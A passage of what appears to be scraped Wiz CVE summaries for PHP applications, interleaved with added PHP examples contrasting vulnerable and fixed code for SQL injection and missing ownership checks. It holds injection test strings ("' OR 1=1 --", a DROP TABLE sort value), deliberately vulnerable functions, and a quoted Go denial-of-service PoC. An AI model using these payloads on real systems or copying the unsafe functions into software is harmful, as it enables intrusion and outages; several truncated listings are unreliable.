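$pdo->exec('CREATE TABLE purchasables (id INTEGER PRIMARY KEY, sku TEXT NOT NULL, price REAL NOT NULL)');
$ins = $pdo->prepare('INSERT INTO purchasables (sku, price) VALUES (?, ?)');
foreach ([['WIDGET-1', 9.5], ['WIDGET_1', 19.0], ['GADGET', 4.25]] as $row) {   // constructed rows
    $ins->execute($row);
}

/** Escape LIKE metacharacters so the user searches for a literal string, not a pattern. */
function likeLiteral(string $term): string
{
    return str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $term);
}

/** Vulnerable: the term is spliced into the query text, quotes and all. */
function searchUnsafe(PDO $pdo, string $term): array
{
    return $pdo->query("SELECT sku FROM purchasables WHERE sku LIKE '%$term%'")->fetchAll(PDO::FETCH_COLUMN);
}

/** Fixed: bound pattern with ESCAPE; sort column looked up, never trusted. */
function searchSafe(PDO $pdo, string $term, string $sort = 'id|asc'): array
{
    $columns = ['id' => 'id', 'sku' => 'sku', 'price' => 'price'];   // allow-list
    [$col, $dir] = array_pad(explode('|', $sort, 2), 2, 'asc');
    if (!isset($columns[$col])) {
        throw new InvalidArgumentException("unknown sort column: $col");
    }
    $dir = strtolower($dir) === 'desc' ? 'DESC' : 'ASC';
    $stmt = $pdo->prepare(
        "SELECT sku FROM purchasables WHERE sku LIKE :pat ESCAPE '\\' ORDER BY {$columns[$col]} $dir"
    );
    $stmt->execute([':pat' => '%' . likeLiteral($term) . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// 1. A literal underscore: the unsafe query treats it as a one-character wildcard.
assert(searchUnsafe($pdo, 'T_1') === ['WIDGET-1', 'WIDGET_1']);
assert(searchSafe($pdo, 'T_1') === ['WIDGET_1']);

// 2. Boolean injection through the term (a time-based payload differs only in what follows OR).
$inject = "' OR 1=1 --";
assert(count(searchUnsafe($pdo, $inject)) === 3);   // whole table
assert(searchSafe($pdo, $inject) === []);           // no sku contains that text

// 3. ORDER BY: an allow-listed column works; anything else is refused before SQL is built.
assert(searchSafe($pdo, 'WIDGET', 'price|desc') === ['WIDGET_1', 'WIDGET-1']);
try {
    searchSafe($pdo, 'WIDGET', 'sku; DROP TABLE purchasables|asc');
    assert(false);
} catch (InvalidArgumentException) {
}
assert(count($pdo->query('SELECT * FROM purchasables')->fetchAll()) === 3);
```

The `sort` handling is the part that query builders do not do for you: as the advisory says, Yii2's `orderBy()` does not escape array keys, and neither does any other builder treat an identifier as data. A map from client-visible sort names to real column names is the only reliable fix.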
Source : NVD
## 8.7
Score
Published March 10, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-28685 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-28685 [MEDIUM] CVE-2026-28685 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28685 :
PHP vulnerability analysis and mitigation
Kimai is a web-based multi-user time-tracking application. Prior to version 2.51.0, "GET /api/invoices/{id}" only checks the role-based view_invoice permission but does not verify the requesting user has access to the invoice's customer. Any user with ROLE_TEAMLEAD (which grants view_invoice) can read all invoices in the system, including those belonging to customers assigned to other teams. This issue has been patched in version 2.51.0.
Source : NVD
## 6.5
Score
Published March 6, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.4
Wiz
CVE-2025-67737 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.1
CVE-2025-67737 [LOW] CVE-2025-67737 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67737 :
PHP vulnerability analysis and mitigation
AzuraCast is a self-hosted, all-in-one web radio management suite. Version 0.23.1 mistakenly includes an API endpoint that is intended for internal use by the SFTP software sftpgo, exposing it to the public-facing HTTP API for AzuraCast installations. A user with specific internal knowledge of a station's operations can craft a custom HTTP request that would affect the contents of a station's database, without revealing any internal information about the station. In order to carry out an attack, a malicious user would need to know a valid SFTP station username and the corresponding internal filesystem structure. This issue is fixed in version 0.23.2.
Source : NVD
## 3.7
Score
Published December 12, 2025
Severity LOW
Wiz
CVE-2026-21447 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-21447 [HIGH] CVE-2026-21447 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21447 :
PHP vulnerability analysis and mitigation
Bagisto is an open source laravel eCommerce platform. Prior to version 2.3.10, an Insecure Direct Object Reference vulnerability in the customer order reorder function allows any authenticated customer to add items from another customer's order to their own shopping cart by manipulating the order ID parameter. This exposes sensitive purchase information and enables potential fraud. Version 2.3.10 patches the issue.
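The object-level authorization check that this entry, the Craft Commerce cart IDOR (CVE-2026-31867), the Kimai invoice endpoint (CVE-2026-28685) and the Admidio `user_uuid` logic bug (CVE-2026-30927) above all lack, as an added example. This is not code from any of those projects; it assumes PHP 8 and uses a constructed in-memory store.

```php
<?php
declare(strict_types=1);

// Added example, not Craft Commerce, Kimai, Admidio or Bagisto code (PHP 8).
// The shared bug: an object is loaded by a client-supplied identifier and the
// only check is "does it exist / is it in the right state", never "may this
// caller touch it". Every load below goes through an ownership or team check.

final class User
{
    public function __construct(public int $id, public array $teams = [], public bool $admin = false) {}
}

final class Forbidden extends RuntimeException {}

final class Store   // constructed data
{
    public array $carts = [
        'a1b2c3d4e5f60718293a4b5c6d7e8f90' => ['owner' => 7, 'completed' => false],
        '00000000000000000000000000000001' => ['owner' => 9, 'completed' => false],
    ];
    public array $invoices = [101 => ['team' => 'north'], 102 => ['team' => 'south']];
}

/** Vulnerable cart load (CVE-2026-31867 shape): existence and state only. */
function loadCartUnsafe(Store $s, string $number): array
{
    $cart = $s->carts[$number] ?? throw new RuntimeException('no such cart');
    if ($cart['completed']) {
        throw new RuntimeException('cart is complete');
    }
    return $cart;
}

/** Fixed: the cart must also belong to the caller (admins excepted). */
function loadCartSafe(Store $s, User $u, string $number): array
{
    $cart = loadCartUnsafe($s, $number);
    if (!$u->admin && $cart['owner'] !== $u->id) {
        throw new Forbidden('not your cart');
    }
    return $cart;
}

/** Kimai shape: a role grants "view invoices", but the customer's team still has to match. */
function loadInvoiceSafe(Store $s, User $u, int $id): array
{
    $inv = $s->invoices[$id] ?? throw new RuntimeException('no such invoice');
    if (!$u->admin && !in_array($inv['team'], $u->teams, true)) {
        throw new Forbidden('invoice belongs to another team');
    }
    return $inv;
}

/** Admidio shape: acting on someone else requires leadership; "event is open" is not a substitute. */
function canRegisterFor(bool $eventOpen, bool $callerIsLeader, int $callerId, int $targetId): bool
{
    if (!$eventOpen) {
        return false;
    }
    return $targetId === $callerId || $callerIsLeader;
}

$store = new Store();
$member = new User(id: 7, teams: ['north']);

// IDOR: the unsafe loader hands over another customer's cart; the safe one refuses.
assert(loadCartUnsafe($store, '00000000000000000000000000000001')['owner'] === 9);
try { loadCartSafe($store, $member, '00000000000000000000000000000001'); assert(false); } catch (Forbidden) {}
assert(loadCartSafe($store, $member, 'a1b2c3d4e5f60718293a4b5c6d7e8f90')['owner'] === 7);

assert(loadInvoiceSafe($store, $member, 101)['team'] === 'north');
try { loadInvoiceSafe($store, $member, 102); assert(false); } catch (Forbidden) {}

assert(canRegisterFor(eventOpen: true, callerIsLeader: false, callerId: 7, targetId: 7) === true);
assert(canRegisterFor(eventOpen: true, callerIsLeader: false, callerId: 7, targetId: 9) === false);
assert(canRegisterFor(eventOpen: true, callerIsLeader: true,  callerId: 7, targetId: 9) === true);
```

The identifier being hard to guess (a 32-character cart number, a UUID) is not a substitute for the check: numbers leak through referrers, logs and shared links, and the Bagisto and Kimai cases use plain integer ids anyway.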
Source : NVD
## 7.1
Score
Published January 2, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected package
Wiz
CVE-2026-32755 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.7
CVE-2026-32755 [MEDIUM] CVE-2026-32755 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32755 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. In versions 5.0.6 and below, the save_membership action in modules/profile/profile_function.php saves changes to a member's role membership start and end dates but does not validate the CSRF token. The handler checks stop_membership and remove_former_membership against the CSRF token but omits save_membership from that check. Because membership UUIDs appear in the HTML source visible to authenticated users, an attacker can embed a crafted POST form on any external page and trick a role leader into submitting it, silently altering membership dates for any member of roles the victim leads. A role leader's session can be silently exploited via CSRF to manipulate any member's mem
Wiz
CVE-2026-34740 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-34740 [MEDIUM] CVE-2026-34740 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34740 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the EPG (Electronic Program Guide) link feature in AVideo allows authenticated users with upload permissions to store arbitrary URLs that the server fetches on every EPG page visit. The URL is validated only with PHP's FILTER_VALIDATE_URL, which accepts internal network addresses. Although AVideo has a dedicated isSSRFSafeURL() function for preventing SSRF, it is not called in this code path. This results in a stored server-side request forgery vulnerability that can be used to scan internal networks, access cloud metadata services, and interact with internal services. At time of publication, there are no publicly available patches.
Source : NVD
## 6.
Wiz
CVE-2026-32261 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2026-32261 [HIGH] CVE-2026-32261 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32261 :
PHP vulnerability analysis and mitigation
Webhooks for Craft CMS plugin adds the ability to manage “webhooks” in Craft CMS, which will send GET or POST requests when certain events occur. From version 3.0.0 to before version 3.2.0, the Webhooks plugin renders user-supplied template content through Twig’s renderString() function without sandbox protection. This allows an authenticated user with access to the Craft control panel and permissions to access the Webhooks plugin to inject Twig template code that calls arbitrary PHP functions. This is possible even if allowAdminChanges is set to false. This issue has been patched in version 3.2.0.
Source : NVD
## 8.5
Score
Published March 16, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
PHP
Has Public Exp
Wiz
CVE-2025-32957 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2025-32957 [HIGH] CVE-2025-32957 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-32957 :
PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, the application's restore function allows users to upload a .zip file, which is then automatically extracted. A PHP file inside the archive is included using require_once without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included. This issue has been patched in version 5.2.3.
Source : NVD
## 7.2
Score
Published March 31, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 20.2
Exploitation Probabili
Wiz
CVE-2026-25513 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.3
CVE-2026-25513 [HIGH] CVE-2026-25513 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25513 :
PHP vulnerability analysis and mitigation
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the REST API that allows authenticated API users to execute arbitrary SQL queries through the sort parameter. The vulnerability exists in the ModelClass::getOrderBy() method where user-supplied sorting parameters are directly concatenated into the SQL ORDER BY clause without validation or sanitization. This affects all API endpoints that support sorting functionality. This issue has been patched in version 2025.81.
Source : NVD
## 8.3
Score
Published February 4, 2026
Severity HIGH
CNA Score 8.3
Affected Technologies
PHP
Has Public Exploit Yes
Wiz
GHSA-h6rj-3m53-887h Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-h6rj-3m53-887h Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-h6rj-3m53-887h :
PHP vulnerability analysis and mitigation
## Impact
LoginPacket
## PoC
Connect to the server using a custom client.
LoginPacket
Set the value of invalid_key to a highly recursive or massive object structure (e.g., an array containing millions of elements or deeply nested arrays).
warnUndefinedJsonPropertyHandler
```go
// PoC from the advisory: build a deeply nested, very large array and send it
// as the PlayFabID field of the LoginPacket so the server-side JSON mapper
// spends excessive resources walking it.
A := make([]interface{}, 1)
ptr := &A
for i := 0; i < 500; i++ {
	next := make([]interface{}, 1000)
	(*ptr)[0] = next
	ptr = &next
}
data := make([]int, 2000000)
for i := 0; i < 100; i++ {
	data[i] = i
}
(*ptr)[0] = data
d.PlayFabID = A
```
## Patches
var_export
## Workarounds
DataPacketReceiveEvent
LoginPacket
JsonMapper
bExceptionOnUndefinedProperty
true
JsonMapper_Exception
Source : NVD
## 7.5
Score
Published April 6, 2026
Severit
Wiz
GHSA-pvcv-q3q7-266g Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-pvcv-q3q7-266g Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-pvcv-q3q7-266g :
PHP vulnerability analysis and mitigation
## Summary
A flaw in the handling of recovery codes for app-based multi-factor authentication allows the same recovery code to be reused indefinitely. This issue does not affect email-based MFA. It also only applies when recovery codes are enabled.
## Impact
If an attacker gains access to both the user's password and their recovery codes, they can repeatedly complete MFA without the user's app-based second factor. This weakens the expected security of MFA by turning recovery codes into a static, long-term bypass method.
Source : NVD
## 8.1
Score
Published December 9, 2025
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA K
Wiz
CVE-2026-22254 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-22254 [MEDIUM] CVE-2026-22254 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22254 :
PHP vulnerability analysis and mitigation
Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. Versions of Winter CMS before 1.2.10 allowed users with access to the CMS Asset Manager to upload SVGs without automatic sanitization. To actively exploit this security issue, an attacker would need access to the Backend with a user account with the following permission: cms.manage_assets. The Winter CMS maintainers strongly recommend that the cms.manage_assets permission only be reserved to trusted administrators and developers in general. This vulnerability is fixed in 1.2.10.
Source : NVD
## 3.5
Score
Published February 6, 2026
Severity LOW
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CI
Wiz
CVE-2026-5370 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5370 [MEDIUM] CVE-2026-5370 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5370 :
PHP vulnerability analysis and mitigation
A vulnerability was identified in krayin laravel-crm up to 2.2. Impacted is the function composeMail of the file packages/Webkul/Admin/tests/e2e-pw/tests/mail/inbox.spec.ts of the component Activities Module/Notes Module. The manipulation leads to cross site scripting. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The identifier of the patch is 73ed28d466bf14787fdb86a120c656a4af270153. To fix this issue, it is recommended to deploy a patch.
Source : NVD
## 5.1
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabili
Wiz
CVE-2025-15602 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2025-15602 [HIGH] CVE-2025-15602 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-15602 :
PHP vulnerability analysis and mitigation
Snipe-IT versions prior to 8.3.7 contain sensitive user attributes related to account privileges that are insufficiently protected against mass assignment. An authenticated, low-privileged user can craft a malicious API request to modify restricted fields of another user account, including the Super Admin account. By changing the email address of the Super Admin and triggering a password reset, an attacker can fully take over the Super Admin account, resulting in complete administrative control of the Snipe-IT instance.
Source : NVD
## 8.7
Score
Published March 6, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/
Wiz
CVE-2026-34571 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2026-34571 [CRITICAL] CVE-2026-34571 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34571 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, a Stored Cross-Site Scripting (Stored XSS) vulnerability exists in the backend user management functionality. The application fails to properly sanitize user-controlled input before rendering it in the administrative interface, allowing attackers to inject persistent JavaScript code. This results in automatic execution whenever backend users access the affected page, enabling session hijacking, privilege escalation, and full administrative account compromise. This issue has been patched in version 0.31.0.0.
Source : NVD
## 9
Score
Published April 1, 2026
Wiz
CVE-2025-67164 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2025-67164 [CRITICAL] CVE-2025-67164 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67164 :
PHP vulnerability analysis and mitigation
An authenticated arbitrary file upload vulnerability in the /storage/poc.php component of Pagekit CMS v1.0.18 allows attackers to execute arbitrary code via uploading a crafted PHP file.
Source : NVD
## 9.9
Score
Published December 17, 2025
Severity CRITICAL
CNA Score 9.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 30.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pagekit/pagekit
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Dec 21, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, no
Wiz
CVE-2026-30885 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-30885 [MEDIUM] CVE-2026-30885 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30885 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. Prior to 25.0, the /objects/playlistsFromUser.json.php endpoint returns all playlists for any user without requiring authentication or authorization. An unauthenticated attacker can enumerate user IDs and retrieve playlist information including playlist names, video IDs, and playlist status for any user on the platform. This vulnerability is fixed in 25.0.
Source : NVD
## 5.5
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 28
Exploitation Probability (EPSS) 0.1
Affected packages and librarie
Wiz
CVE-2025-68954 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-68954 [HIGH] CVE-2025-68954 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68954 :
PHP vulnerability analysis and mitigation
Pterodactyl is a free, open-source game server management panel. Versions 1.11.11 and below do not revoke active SFTP connections when a user is removed from a server instance or has their permissions changed with respect to file access over SFTP. This allows a user that was already connected to SFTP to remain connected and access files even after their permissions are revoked. A user must have been connected to SFTP at the time of their permissions being revoked in order for this vulnerability to be exploited. This issue is fixed in version 1.12.0.
Source : NVD
## 7.5
Score
Published January 6, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV
Wiz
CVE-2026-33352 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-33352 [CRITICAL] CVE-2026-33352 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33352 :
PHP vulnerability analysis and mitigation
objects/category.php
getAllCategories()
doNotShowCats
str_replace("'", '', ...)
objects/security.php
Source : NVD
## 9.8
Score
Published March 23, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Mar 20, 2026
Wiz
CVE-2026-25633 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-25633 [MEDIUM] CVE-2026-25633 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25633 :
PHP vulnerability analysis and mitigation
Statamic is a Laravel + Git powered CMS designed for building websites. Prior to 5.73.6 and 6.2.5, users without permission to view assets are able to download them and view their metadata. Logged-out users and users without permission to access the control panel are unable to take advantage of this. This has been fixed in 5.73.6 and 6.2.5.
Source : NVD
## 4.3
Score
Published February 11, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity
Wiz
CVE-2026-2894 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-2894 [MEDIUM] CVE-2026-2894 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2894 :
PHP vulnerability analysis and mitigation
A vulnerability was identified in funadmin up to 7.1.0-rc4. Affected by this vulnerability is the function getMember of the file app/frontend/view/login/forget.html. Such manipulation leads to information disclosure. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 5.5
Score
Published February 21, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15
Exploitation Probability (EPSS) N/A
Affected packages and libraries
funadmin
Wiz
CVE-2026-32816 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.7
CVE-2026-32816 [MEDIUM] CVE-2026-32816 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32816 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the delete, activate, and deactivate modes in modules/groups-roles/groups_roles.php perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to callUrlHideElement(), which includes it in the POST body, but the server-side handlers ignore $_POST["adm_csrf_token"] entirely for these three modes. An attacker who can discover a role UUID (visible in the public cards view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the rol_assign_roles right into deleting or toggling roles for the organization. Role de
Wiz
CVE-2026-33759 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33759 [MEDIUM] CVE-2026-33759 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33759 :
PHP vulnerability analysis and mitigation
objects/playlistsVideos.json.php
watch_later
favorite
playlistsFromUser.json.php
playlists_id
Source : NVD
## 5.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 29, 2026
Wiz
CVE-2026-28784 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-28784 [HIGH] CVE-2026-28784 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28784 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 5.8.22 and 4.16.18, it is possible to craft a malicious payload using the Twig map filter in text fields that accept Twig input under Settings in the Craft control panel or using the System Messages utility, which could lead to a RCE. For this to work, you must have administrator access to the Craft Control Panel, and allowAdminChanges must be enabled, which is against our recommendations for any non-dev environment. Alternatively, you can have a non-administrator account with allowAdminChanges disabled, but you have access to the System Messages utility. Users should update to the patched versions (5.8.22 and 4.16.18) to mitigate the issue.
Source : NVD
Wiz
CVE-2025-67850 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2025-67850 [HIGH] CVE-2025-67850 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67850 :
PHP vulnerability analysis and mitigation
A flaw was found in moodle. This vulnerability, known as Cross-Site Scripting (XSS), occurs due to insufficient checks on user-provided data in the formula editor's arithmetic expression fields. A remote attacker could inject malicious code into these fields. When other users view these expressions, the malicious code would execute in their web browsers, potentially compromising their data or leading to unauthorized actions.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 7.3
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-27206 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-27206 [HIGH] CVE-2026-27206 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27206 :
PHP vulnerability analysis and mitigation
Zumba Json Serializer is a library to serialize PHP variables in JSON format. In versions 3.2.2 and below, the library allows deserialization of PHP objects from JSON using a special @type field. The deserializer instantiates any class specified in the @type field without restriction. When processing untrusted JSON input, this behavior may allow an attacker to instantiate arbitrary classes available in the application. If a vulnerable application passes attacker-controlled JSON into JsonSerializer::unserialize() and contains classes with dangerous magic methods (such as __wakeup() or __destruct()), this may lead to PHP Object Injection and potentially Remote Code Execution (RCE), depending on available gadget chains in the app
Wiz
CVE-2026-23476 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-23476 [MEDIUM] CVE-2026-23476 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23476 :
PHP vulnerability analysis and mitigation
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to 2025.8, there is a reflected XSS bug in FacturaScripts. The problem is in how error messages get displayed. Twig's | raw filter is used, which skips HTML escaping. When triggering a database error (like passing a string where an integer is expected), the error message includes the input and gets rendered without sanitization. This vulnerability is fixed in 2025.8.
Source : NVD
## 5.4
Score
Published February 2, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.3
Exploitation
Wiz
CVE-2026-26990 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-26990 [HIGH] CVE-2026-26990 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26990 :
PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below have a Time-Based Blind SQL Injection vulnerability in address-search.inc.php via the address parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses. This vulnerability requires authentication and is exploitable by any authenticated user. This issue has been fixed in version 26.2.0.
Source : NVD
## 8.8
Score
Published February 20, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Explo
Wiz
CVE-2026-33162 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.9
CVE-2026-33162 [MEDIUM] CVE-2026-33162 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33162 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 5.3.0 to before version 5.9.14, an authenticated control panel user with only accessCp can move entries across sections via POST /actions/entries/move-to-section, even when they do not have saveEntries:{sectionUid} permission for either source or destination section. This issue has been patched in version 5.9.14.
Source : NVD
## 4.9
Score
Published March 24, 2026
Severity MEDIUM
CNA Score 4.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:craft
Wiz
CVE-2026-24422 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-24422 [MEDIUM] CVE-2026-24422 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24422 :
PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. In versions 4.0.16 and below, multiple public API endpoints improperly expose sensitive user information due to insufficient access controls. The OpenQuestionController::list() endpoint calls Question::getAll() with showAll=true by default, returning records marked as non-public (isVisible=false) along with user email addresses, with similar exposures present in comment, news, and FAQ APIs. This information disclosure vulnerability could enable attackers to harvest email addresses for phishing campaigns or access content that was explicitly marked as private. This issue has been fixed in version 4.0.17.
Source : NVD
## 7.5
Score
Published January 24, 2026
Severity HIGH
CN
Wiz
CVE-2026-24418 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-24418 [HIGH] CVE-2026-24418 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24418 :
PHP vulnerability analysis and mitigation
